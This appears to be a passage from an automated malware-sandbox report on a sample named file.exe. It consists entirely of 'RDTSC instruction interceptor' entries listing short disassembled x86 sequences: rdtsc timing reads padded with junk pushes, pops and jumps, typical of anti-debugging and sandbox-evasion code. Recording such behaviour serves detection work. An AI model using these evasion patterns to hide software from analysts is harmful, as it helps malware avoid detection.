Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1945E second address: A19462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19462 second address: A19468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1828D second address: A182A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A182A2 second address: A182AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A182AC second address: A182BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A182BC second address: A182C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC487 second address: 825A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC1350240C8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push dword ptr [ebp+122D0951h] 0x00000029 ja 00007FC1350240DBh 0x0000002f call dword ptr [ebp+122D1AD4h] 0x00000035 pushad 0x00000036 cmc 0x00000037 xor eax, eax 0x00000039 jne 00007FC1350240DDh 0x0000003f jmp 00007FC1350240D7h 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 cld 0x00000049 mov dword ptr [ebp+122D2840h], eax 0x0000004f mov dword ptr [ebp+122D1830h], ecx 0x00000055 mov esi, 0000003Ch 0x0000005a sub dword ptr [ebp+122D1830h], ebx 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 pushad 0x00000065 and ah, 00000079h 0x00000068 jmp 00007FC1350240D5h 0x0000006d popad 0x0000006e lodsw 0x00000070 mov dword ptr [ebp+122D1830h], eax 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a xor dword ptr [ebp+122D1830h], esi 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FC1350240CEh 0x00000089 nop 0x0000008a jo 00007FC1350240D8h 0x00000090 push eax 0x00000091 push edx 0x00000092 jng 00007FC1350240C6h 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC61F second address: 9DC635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FC134D1C048h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC635 second address: 9DC65C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC65C second address: 9DC677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007FC134D1C046h 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC677 second address: 9DC67C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC67C second address: 9DC682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC781 second address: 9DC798 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC1350240CCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC798 second address: 9DC7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC134D1C046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCB3A second address: 9DCB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCB3E second address: 9DCB48 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCB48 second address: 9DCBA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FC1350240D5h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FC1350240C8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000004h 0x0000002d mov edx, dword ptr [ebp+12458547h] 0x00000033 nop 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCBA4 second address: 9DCBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC134D1C046h 0x0000000a popad 0x0000000b jnp 00007FC134D1C04Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCBB7 second address: 9DCBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC1350240D3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCBD2 second address: 9DCBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD02E second address: 9DD060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jnc 00007FC1350240D9h 0x0000000d nop 0x0000000e mov edx, 480F45EBh 0x00000013 push 0000001Eh 0x00000015 mov dx, si 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD060 second address: 9DD064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD064 second address: 9DD080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD3B4 second address: 9DD3F4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC134D1C04Eh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FC134D1C052h 0x00000017 jne 00007FC134D1C048h 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD3F4 second address: 9DD3F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD3F9 second address: 9DD425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC134D1C058h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007FC134D1C046h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD425 second address: 9DD42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD42A second address: 9DD430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD4B9 second address: 9DD4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD4BD second address: 9DD4C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD4C3 second address: 9DD4C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD4C9 second address: 9DD51E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC134D1C054h 0x00000011 nop 0x00000012 lea eax, dword ptr [ebp+12489E40h] 0x00000018 jmp 00007FC134D1C050h 0x0000001d and edx, dword ptr [ebp+122D1B27h] 0x00000023 nop 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD51E second address: 9DD534 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007FC1350240D0h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD534 second address: 9DD5BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FC134D1C048h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov edx, 63D8B3C7h 0x00000026 movzx ecx, dx 0x00000029 lea eax, dword ptr [ebp+12489DFCh] 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FC134D1C048h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 call 00007FC134D1C04Bh 0x0000004e jne 00007FC134D1C047h 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FC134D1C057h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A185E2 second address: A185EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A185EA second address: A185F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18733 second address: A18740 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC1350240C8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18740 second address: A1878D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC134D1C046h 0x0000000a jnl 00007FC134D1C046h 0x00000010 jmp 00007FC134D1C056h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push ebx 0x0000001a jmp 00007FC134D1C052h 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC134D1C04Bh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A188CA second address: A188EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A188EC second address: A188F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A188F2 second address: A188F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18CA5 second address: A18CC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC134D1C052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18CC0 second address: A18CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A20784 second address: A207A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC134D1C052h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207A4 second address: A207BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC1350240CFh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207BE second address: A207C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207C4 second address: A207C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207C9 second address: A207D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC134D1C046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207D3 second address: A207D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207D7 second address: A207DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207DD second address: A207E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A207E7 second address: A207ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F04 second address: A22F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F0A second address: A22F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F14 second address: A22F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F18 second address: A22F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F1E second address: A22F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F24 second address: A22F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F2C second address: A22F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A52 second address: A22A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FC134D1C052h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A6D second address: A22A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A71 second address: A22A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC134D1C053h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22A9A second address: A22A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22C08 second address: A22C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FC134D1C050h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jo 00007FC134D1C046h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22C2E second address: A22C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC1350240C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22C39 second address: A22C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29837 second address: A29863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC1350240D7h 0x0000000e jp 00007FC1350240C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29863 second address: A2986D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC134D1C046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2811C second address: A28120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28120 second address: A28141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC134D1C046h 0x00000010 jmp 00007FC134D1C051h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28141 second address: A2814C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2814C second address: A28152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A282BB second address: A282D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240CFh 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007FC1350240CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2859E second address: A285A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28739 second address: A28754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28754 second address: A2876C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC134D1C053h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2876C second address: A28775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28775 second address: A28779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28779 second address: A2877D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288D7 second address: A288DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288DB second address: A288ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCD7D second address: 9DCD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCD81 second address: 9DCD9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCD9F second address: 9DCDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCDA3 second address: 9DCDC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FC1350240E5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC1350240D3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCDC6 second address: 9DCDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE82 second address: 9DCEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC1350240D5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC1350240CDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCEAF second address: 9DCEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A76 second address: A28A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A7A second address: A28A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a js 00007FC134D1C046h 0x00000010 jmp 00007FC134D1C04Ah 0x00000015 pop eax 0x00000016 jnl 00007FC134D1C04Ah 0x0000001c rdtsc
